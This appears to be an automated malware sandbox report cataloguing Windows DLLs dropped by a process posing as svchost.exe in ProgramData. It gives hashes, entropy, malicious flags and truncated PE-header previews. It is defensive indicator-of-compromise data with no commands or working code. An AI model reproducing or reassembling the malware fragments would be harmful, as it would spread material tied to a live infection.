                                                                                                                                                          SHA-512:6E34346EA8A0AACC29CCD480035DA66E280830A7F3D220FD2F12D4CFA3E1C03955D58C0B95C2674AEA698A36A1B674325D3588483505874C2CE018135320FF99
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............d...d...d.......d...e...d...a...d...`...d...g...d.d.e...d...`...d...e...d.:.e...d...e.I.d.d.i...d.d.d...d.d...d.d.f...d.Rich..d.........................PE..d.....,d.........." ................@Z..............................................!.....`..........................................P.......P..................D......../..............T...........................0...8...............H............................text............................... ..`.rdata...k.......l..................@..@.data...T>...p...8...\..............@....pdata..D...........................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):254744
                                                                                                                                                          Entropy (8bit):6.564308911485739
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:3LT2sto29vTlN5cdIKdo4/3VaV8FlBa9qWMa3pLW1A/T8O51j4iab9M:H2s/9vTlPcdk4vVtFU98iIu
                                                                                                                                                          MD5:20C77203DDF9FF2FF96D6D11DEA2EDCF
                                                                                                                                                          SHA1:0D660B8D1161E72C993C6E2AB0292A409F6379A5
                                                                                                                                                          SHA-256:9AAC010A424C757C434C460C3C0A6515D7720966AB64BAD667539282A17B4133
                                                                                                                                                          SHA-512:2B24346ECE2CBD1E9472A0E70768A8B4A5D2C12B3D83934F22EBDC9392D9023DCB44D2322ADA9EDBE2EB0E2C01B5742D2A83FA57CA23054080909EC6EB7CF3CA
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........76..VX..VX..VX.....VX..#Y..VX..#]..VX..#\..VX..#[..VX.t#Y..VX...Y..VX..VY.+VX.t#[..VX.t#U..VX.t#X..VX.t#...VX.t#Z..VX.Rich.VX.........................PE..d.....,d.........." .....|...:.......................................................r....`..........................................T..P...0U...................'......./......<...0...T...............................8............................................text....{.......|.................. ..`.rdata..............................@..@.data....)...p...$...X..............@....pdata...'.......(...|..............@..@.rsrc...............................@..@.reloc..<...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):64792
                                                                                                                                                          Entropy (8bit):6.223467179037751
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:/smKJPganCspF1dqZAC2QjP2RILOIld7SyEPxDF:/smKpgNoF1dqZDnjP2RILOIv2xB
                                                                                                                                                          MD5:D4674750C732F0DB4C4DD6A83A9124FE
                                                                                                                                                          SHA1:FD8D76817ABC847BB8359A7C268ACADA9D26BFD5
                                                                                                                                                          SHA-256:CAA4D2F8795E9A55E128409CC016E2CC5C694CB026D7058FC561E4DD131ED1C9
                                                                                                                                                          SHA-512:97D57CFB80DD9DD822F2F30F836E13A52F771EE8485BC0FD29236882970F6BFBDFAAC3F2E333BBA5C25C20255E8C0F5AD82D8BC8A6B6E2F7A07EA94A9149C81E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..b?..b?..b?......b?..>..b?..:..b?..;..b?..<..b?.2.>..b?..>..b?.7.>..b?..b>.pb?.2.2..b?.2.?..b?.2....b?.2.=..b?.Rich.b?.........PE..d.....,d.........." .....P...........<....................................................`............................................P...0............................/......T....k..T............................k..8............`.. ............................text....N.......P.................. ..`.rdata..4P...`...R...T..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):158488
                                                                                                                                                          Entropy (8bit):6.8491143497239655
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:j0k3SXjD9aWpAn3rb7SbuDlvNgS4fWqEznfo9mNoFTSlXZ8Ax5ILZ1GIxq:j0kiXjD9v8X7Euk4wYOFTafxn
                                                                                                                                                          MD5:7447EFD8D71E8A1929BE0FAC722B42DC
                                                                                                                                                          SHA1:6080C1B84C2DCBF03DCC2D95306615FF5FCE49A6
                                                                                                                                                          SHA-256:60793C8592193CFBD00FD3E5263BE4315D650BA4F9E4FDA9C45A10642FD998BE
                                                                                                                                                          SHA-512:C6295D45ED6C4F7534C1A38D47DDC55FEA8B9F62BBDC0743E4D22E8AD0484984F8AB077B73E683D0A92D11BF6588A1AE395456CFA57DA94BB2A6C4A1B07984DE
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.M...M...M...D..I.......O.......F.......E.......N.......N.......O...M...(.......w.......L.......L.......L...RichM...................PE..d...&.,d.........." .....`..........p3...............................................4....`.............................................L.......x....`.......@.......<.../...p..D...H{..T............................{..8............p...............................text....^.......`.................. ..`.rdata.......p.......d..............@..@.data........0......................@....pdata.......@......................@..@.rsrc........`.......0..............@..@.reloc..D....p.......:..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1165824
                                                                                                                                                          Entropy (8bit):7.0564514753444785
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:LsZDXB6wmcZzdcZ7fUoPHUEXLznTTenIGHSQt:QZDXB6wmcUfTKHHt
                                                                                                                                                          MD5:0359DFA90FFB2E190C91A4DE76E36BF7
                                                                                                                                                          SHA1:E4FFFAC0206C2E41B44898AAA49583212F406DEE
                                                                                                                                                          SHA-256:22C1CA2F788196DF27FDBE4A9B36CB7CBAE51CD38CF1C1ABF44BAD66CC82C236
                                                                                                                                                          SHA-512:AEC3EAE25FC4CEE3A1B6A9304369CEE8DA5CCC771971456B1FF0F750BB17C9BA038B26CAAF2421ACBB40AE9C4D79275C0D04045098D188926C84E25C532ABBD0
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".....b..........0..........p.....................................[........ .........................................+........................'...........................................`..(...................d................................text...ha.......b..................`.P`.data................f..............@.`..rdata..p............h..............@.`@.pdata...'.......(...V..............@.0@.xdata..L,...........~..............@.0@.bss....h.............................`..edata..+...........................@.0@.idata..............................@.0..CRT....X...........................@.@..tls................................@.@..reloc..............................@.0B........................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):31512
                                                                                                                                                          Entropy (8bit):6.563116725717513
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:bxrUGCpa6rIxdK/rAwVILQU85YiSyvz5PxWEaAc:trUZIzYrAwVILQUG7SydPxDc
                                                                                                                                                          MD5:D8C1B81BBC125B6AD1F48A172181336E
                                                                                                                                                          SHA1:3FF1D8DCEC04CE16E97E12263B9233FBF982340C
                                                                                                                                                          SHA-256:925F05255F4AAE0997DC4EC94D900FD15950FD840685D5B8AA755427C7422B14
                                                                                                                                                          SHA-512:CCC9F0D3ACA66729832F26BE12F8E7021834BBEE1F4A45DA9451B1AA5C2E63126C0031D223AF57CF71FAD2C85860782A56D78D8339B35720194DF139076E0772
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........a............................................V...................V......V......V......V......Rich....................PE..d.....,d.........." .........6......................................................N.....`.........................................@C..L....C..d....p.......`.......L.../...........3..T...........................p3..8............0.. ............................text...~........................... ..`.rdata.......0......................@..@.data........P.......8..............@....pdata.......`.......<..............@..@.rsrc........p.......@..............@..@.reloc...............J..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):79128
                                                                                                                                                          Entropy (8bit):6.284790077237953
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:ZmtvsXhgzrojAs9/s+S+pGLypbyxk/DDTBVILLwX7SyiPx9:c56OzyAs9/sT+pGLypb+k/XFVILLwX4f
                                                                                                                                                          MD5:819166054FEC07EFCD1062F13C2147EE
SHA1:93868EBCD6E013FDA9CD96D8065A1D70A66A2A26
SHA-256:E6DEB751039CD5424A139708475CE83F9C042D43E650765A716CB4A924B07E4F
SHA-512:DA3A440C94CB99B8AF7D2BC8F8F0631AE9C112BD04BADF200EDBF7EA0C48D012843B4A9FB9F1E6D3A9674FD3D4EB6F0FA78FD1121FAD1F01F3B981028538B666
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~...:...:...:...3.i.<...h...8...h...6...h...2...h...9.......8...:.......q...=.......;.......;.......;.......;...Rich:...........PE..d.....,d.........." .....l...........%.......................................P............`.............................................P............0....... ..<......../...@..........T..............................8............................................text...fj.......l.................. ..`.rdata..Ts.......t...p..............@..@.data...............................@....pdata..<.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................

Process:C:\ProgramData\svchost.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):160536
Entropy (8bit):6.027748879187965
Encrypted:false
SSDEEP:3072:OwYiZ+PtocHnVXhLlasuvMETxoEBA+nbUtGnBSonJCNI5ILC7Gax1:FYk+PtocHVxx/uvPCEwhGJ
MD5:7910FB2AF40E81BEE211182CFFEC0A06
SHA1:251482ED44840B3C75426DD8E3280059D2CA06C6
SHA-256:D2A7999E234E33828888AD455BAA6AB101D90323579ABC1095B8C42F0F723B6F
SHA-512:BFE6506FEB27A592FE9CF1DB7D567D0D07F148EF1A2C969F1E4F7F29740C6BB8CCF946131E65FE5AA8EDE371686C272B0860BD4C0C223195AAA1A44F59301B27
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C.-...-...-.....-...,...-...(...-...)...-.......-.W.,...-.R.,...-...,...-...,...-.W. ...-.W.-...-.W....-.W./...-.Rich..-.................PE..d.....,d.........." ................l*..............................................%.....`.............................................d...........`.......P.......D.../...p..8.......T...............................8............................................text...(........................... ..`.rdata..6...........................@..@.data....j.......f..................@....pdata.......P....... ..............@..@.rsrc........`.......,..............@..@.reloc..8....p.......6..............@..B................................................................................................................................................................................................................................

Process:C:\ProgramData\svchost.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22128
Entropy (8bit):4.746916379473427
Encrypted:false
SSDEEP:192:HFOhEWhhW9DWGxVA6VWQ4iW7rd9ZnAOVX01k9z3AAcodV:HFdWhhWhxdm31AqR9z7BV
MD5:40BA4A99BF4911A3BCA41F5E3412291F
SHA1:C9A0E81EB698A419169D462BCD04D96EAA21D278
SHA-256:AF0E561BB3B2A13AA5CA9DFC9BC53C852BAD85075261AF6EF6825E19E71483A6
SHA-512:F11B98FF588C2E8A88FDD61D267AA46DC5240D8E6E2BFEEA174231EDA3AFFC90B991FF9AAE80F7CEA412AFC54092DE5857159569496D47026F8833757C455C23
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....dZ..........." .........0...............................................@............`A........................................p...,............0...............0..p&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\ProgramData\svchost.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22120
Entropy (8bit):4.597173095457187
Encrypted:false
SSDEEP:192:LWhhW8R9WvkJ0f5AbVWQ4mWC7ZNKd2kQX01k9z3Ad4+BhNKD:LWhhWgaab/NNPR9zw4fD
MD5:C5E3E5DF803C9A6D906F3859355298E1
SHA1:0ECD85619EE5CE0A47FF840652A7C7EF33E73CF4
SHA-256:956773A969A6213F4685C21702B9ED5BD984E063CF8188ACBB6D55B1D6CCBD4E
SHA-512:DEEDEF8EAAC9089F0004B6814862371B276FBCC8DF45BA7F87324B2354710050D22382C601EF8B4E2C5A26C8318203E589AA4CAF05EB2E80E9E8C87FD863DFC9
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....N7.........." .........0...............................................@............`A........................................p................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\ProgramData\svchost.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22128
Entropy (8bit):4.609345057720842
Encrypted:false
SSDEEP:192:9WhhW1WGxVA6VWQ4cRWAAuENQlO8X01k9z3AenFbvrJ:9WhhWhxdleuEKlO8R9zhFHJ
MD5:71F1D24C7659171EAFEF4774E5623113
SHA1:8712556B19ED9F80B9D4B6687DECFEB671AD3BFE
SHA-256:C45034620A5BB4A16E7DD0AFF235CC695A5516A4194F4FEC608B89EABD63EEEF
SHA-512:0A14C03365ADB96A0AD539F8E8D8333C042668046CEA63C0D11C75BE0A228646EA5B3FBD6719C29580B8BAAEB7A28DC027AF3DE10082C07E089CDDA43D5C467A
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....IL..........." .........0...............................................@............`A........................................p................0...............0..p&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\ProgramData\svchost.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22112
Entropy (8bit):4.640577240680024
Encrypted:false
SSDEEP:192:IzmxD3T4qbWhhWNc5WvkJ0f5AbVWQ4OWXIH52mvp13s5yX01k9z3A3MNL3:IzQNWhhWNchaabdHMmfcYR9zEMNr
MD5:F1534C43C775D2CCEB86F03DF4A5657D
SHA1:9ED81E2AD243965E1090523B0C915E1D1D34B9E1
SHA-256:6E6BFDC656F0CF22FABBA1A25A42B46120B1833D846F2008952FE39FE4E57AB2
SHA-512:62919D33C7225B7B7F97FAF4A59791F417037704EB970CB1CB8C50610E6B2E86052480CDBA771E4FAD9D06454C955F83DDB4AEA2A057725385460617B48F86A7
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................." .........0...............................................@............`A........................................p................0...............0..`&..............p............................................................................rdata..H...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\ProgramData\svchost.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):26224
Entropy (8bit):4.864482970861573
Encrypted:false
SSDEEP:192:xaNYPvVX8rFTsiWhhWWnWGxVA6VWQ4cRWtlAd9ZnAOVX01k9z3AAcosm6:nPvVXkWhhWQxdlP31AqR9z76
MD5:EA00855213F278D9804105E5045E2882
SHA1:07C6141E993B21C4AA27A6C2048BA0CFF4A75793
SHA-256:F2F74A801F05AB014D514F0F1D0B3DA50396E6506196D8BECCC484CD969621A6
SHA-512:B23B78B7BD4138BB213B9A33120854249308BB2CF0D136676174C3D61852A0AC362271A24955939F04813CC228CD75B3E62210382A33444165C6E20B5E0A7F24
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....(............" .........@...............................................P............`A........................................p................@...............@..p&..............p............................................................................rdata..|........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\ProgramData\svchost.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22120
Entropy (8bit):4.615608208407289
Encrypted:false
SSDEEP:192:4TGaWhhWMWvkJ0f5AbVWQ4cRWhW9qUd9ZnAOVX01k9z3AAcoXXcX:4qaWhhWIaablbR31AqR9z77MX
MD5:BCB8B9F6606D4094270B6D9B2ED92139
SHA1:BD55E985DB649EADCB444857BEED397362A2BA7B
SHA-256:FA18D63A117153E2ACE5400ED89B0806E96F0627D9DB935906BE9294A3038118
SHA-512:869B2B38FD528B033B3EC17A4144D818E42242B83D7BE48E2E6DA6992111758B302F48F52E0DD76BECB526A90A2B040CE143C6D4F0E009A513017F06B9A8F2B9
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....RS.........." .........0...............................................@............`A........................................p...L............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\ProgramData\svchost.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):18696
Entropy (8bit):7.054510010549814
Encrypted:false
SSDEEP:384:eVrW1hWbvm0GftpBjzH4m3S9gTlUK3dsl:eVuAViaB/6sl
MD5:BFFFA7117FD9B1622C66D949BAC3F1D7
SHA1:402B7B8F8DCFD321B1D12FC85A1EE5137A5569B2
SHA-256:1EA267A2E6284F17DD548C6F2285E19F7EDB15D6E737A55391140CE5CB95225E
SHA-512:B319CC7B436B1BE165CDF6FFCAB8A87FE29DE78F7E0B14C8F562BE160481FB5483289BD5956FDC1D8660DA7A3F86D8EEDE35C6CC2B7C3D4C852DECF4B2DCDB7F
Malicious:false
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...4.F>.........." .........................................................0............`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\ProgramData\svchost.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22128
Entropy (8bit):4.625038284904601
Encrypted:false
SSDEEP:192:9jWhhWmWGxVA6VWQ4cRWMj656CqRqNX01k9z3A8oXblIHNQ:9jWhhWSxdlE5DNR9zrG6Ha
MD5:D584C1E0F0A0B568FCE0EFD728255515
SHA1:2E5CE6D4655C391F2B2F24FC207FDF0E6CD0CC2A
SHA-256:3DE40A35254E3E0E0C6DB162155D5E79768A6664B33466BF603516F3743EFB18
SHA-512:C7D1489BF81E552C022493BB5A3CD95CCC81DBEDAAA8FDC0048CACBD087913F90B366EEB4BF72BF4A56923541D978B80D7691D96DBBC845625F102C271072C42
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....Hb..........." .........0...............................................@............`A........................................p...`............0...............0..p&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\ProgramData\svchost.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22120
Entropy (8bit):4.723757189784349
Encrypted:false
SSDEEP:192:bdxlxWhhWWWvkJ0f5AbVWQ4cRWKmX56CqRqNX01k9z3A8oXjl:bdxlxWhhW2aablm5DNR9zrG
MD5:6168023BDB7A9DDC69042BEECADBE811
SHA1:54EE35ABAE5173F7DC6DAFC143AE329E79EC4B70
SHA-256:4EA8399DEBE9D3AE00559D82BC99E4E26F310934D3FD1D1F61177342CF526062
SHA-512:F1016797F42403BB204D4B15D75D25091C5A0AB8389061420E1E126D2214190A08F02E2862A2AE564770397E677B5BCDD2779AB948E6A3E639AA77B94D0B3F6C
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....B.l.........." .........0...............................................@......).....`A........................................p................0...............0..h&..............p............................................................................rdata..|...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22120
                                                                                                                                                          Entropy (8bit):4.654830959351148
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:r4WhhWWsWvkJ0f5AbVWQ4cRWsQOZD2X01k9z3AG2hqvz:0WhhWRaablKZR9zVQM
                                                                                                                                                          MD5:4F631924E3F102301DAC36B514BE7666
                                                                                                                                                          SHA1:B3740A0ACDAF3FBA60505A135B903E88ACB48279
                                                                                                                                                          SHA-256:E2406077621DCE39984DA779F4D436C534A31C5E863DB1F65DE5939D962157AF
                                                                                                                                                          SHA-512:56F9FB629675525CBE84A29D44105B9587A9359663085B62F3FBE3EEA66451DA829B1B6F888606BC79754B6B814CA4A1B215F04F301EFE4DB0D969187D6F76F1
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...}.o..........." .........0...............................................@......x.....`A........................................p................0...............0..h&..............p............................................................................rdata..L...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22120
                                                                                                                                                          Entropy (8bit):4.868673796157719
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:oTvuBL3BBLIWhhW5WvkJ0f5AbVWQ4cRWsmIngqtVVwX01k9z3Acqk3:oTvuBL3BaWhhWhaablkqVwR9zHR
                                                                                                                                                          MD5:8DFC224C610DD47C6EC95E80068B40C5
                                                                                                                                                          SHA1:178356B790759DC9908835E567EDFB67420FBAAC
                                                                                                                                                          SHA-256:7B8C7E09030DF8CDC899B9162452105F8BAEB03CA847E552A57F7C81197762F2
                                                                                                                                                          SHA-512:FE5BE81BFCE4A0442DD1901721F36B1E2EFCDCEE1FDD31D7612AD5676E6C5AE5E23E9A96B2789CB42B7B26E813347F0C02614937C561016F1563F0887E69BBEE
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....g..........." .........0...............................................@......fK....`A........................................p................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22128
                                                                                                                                                          Entropy (8bit):5.357912030694384
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:jnaOMw3zdp3bwjGzue9/0jCRrndbnWhhWRxdlF5DNR9zrGDLC:mOMwBprwjGzue9/0jCRrndbemr9zay
                                                                                                                                                          MD5:20DDF543A1ABE7AEE845DE1EC1D3AA8E
                                                                                                                                                          SHA1:0EAF5DE57369E1DB7F275A2FFFD2D2C9E5AF65BF
                                                                                                                                                          SHA-256:D045A72C3E4D21165E9372F76B44FF116446C1E0C221D9CEA3AB0A1134A310E8
                                                                                                                                                          SHA-512:96DD48DF315A7EEA280CA3DA0965A937A649EE77A82A1049E3D09B234439F7D927D7FB749073D7AF1B23DADB643978B70DCDADC6C503FE850B512B0C9C1C78DD
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...0.&3.........." .........0...............................................@............`A........................................p................0...............0..p&..............p............................................................................rdata..D...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22120
                                                                                                                                                          Entropy (8bit):4.755674101565431
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:q8WhhWUWvkJ0f5AbVWQ4cRW9RvBwUoX01k9z3AuJGzx:q8WhhWgaablSUR9zxk
                                                                                                                                                          MD5:C4098D0E952519161F4FD4846EC2B7FC
                                                                                                                                                          SHA1:8138CA7EB3015FC617620F05530E4D939CAFBD77
                                                                                                                                                          SHA-256:51B2103E0576B790D5F5FDACB42AF5DAC357F1FD37AFBAAF4C462241C90694B4
                                                                                                                                                          SHA-512:95AA4C7071BC3E3FA4DB80742F587A0B80A452415C816003E894D2582832CF6EAC645A26408145245D4DEABE71F00ECCF6ADB38867206BEDD5AA0A6413D241F5
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...`.@f.........." .........0...............................................@......E.....`A........................................p...l............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22128
                                                                                                                                                          Entropy (8bit):4.706939855964842
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:vyWhhWQWGxVA6VWQ4cRWzco456CqRqNX01k9z3A8oXdlxG:KWhhWoxdlvo45DNR9zrGhG
                                                                                                                                                          MD5:EAF36A1EAD954DE087C5AA7AC4B4ADAD
                                                                                                                                                          SHA1:9DD6BC47E60EF90794A57C3A84967B3062F73C3C
                                                                                                                                                          SHA-256:CDBA9DC9AF63EBD38301A2E7E52391343EFEB54349FC2D9B4EE7B6BF4F9CF6EB
                                                                                                                                                          SHA-512:1AF9E60BF5C186CED5877A7FA690D9690B854FAA7E6B87B0365521EAFB7497FB7370AC023DB344A6A92DB2544B5BDC6E2744C03B10C286EBBF4F57C6CA3722CF
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...j............" .........0...............................................@.......Y....`A........................................p................0...............0..p&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22120
                                                                                                                                                          Entropy (8bit):4.879924502333097
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:nEFPmWhhWiWvkJ0f5AbVWQ4cRWdEnZBwUoX01k9z3AuJGzCM:EFuWhhW6aablNZUR9zx
                                                                                                                                                          MD5:8711E4075FA47880A2CB2BB3013B801A
                                                                                                                                                          SHA1:B7CEEC13E3D943F26DEF4C8A93935315C8BB1AC3
                                                                                                                                                          SHA-256:5BCC3A2D7D651BB1ECC41AA8CD171B5F2B634745E58A8503B702E43AEE7CD8C6
                                                                                                                                                          SHA-512:7370E4ACB298B2E690CCD234BD6C95E81A5B870AE225BC0AD8FA80F4473A85E44ACC6159502085FE664075AFA940CFF3DE8363304B66A193AC970CED1BA60AAE
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...L.Y..........." .........0...............................................@...........`A........................................p...H............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22120
                                                                                                                                                          Entropy (8bit):5.227317911828185
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:Lck1JzNcKSI8WhhWCaabl5ujezWSR9zchTL:TcKS+Hznwq9zS
                                                                                                                                                          MD5:8E6EB11588FA9625B68960A46A9B1391
                                                                                                                                                          SHA1:FF81F0B3562E846194D330FADF2AB12872BE8245
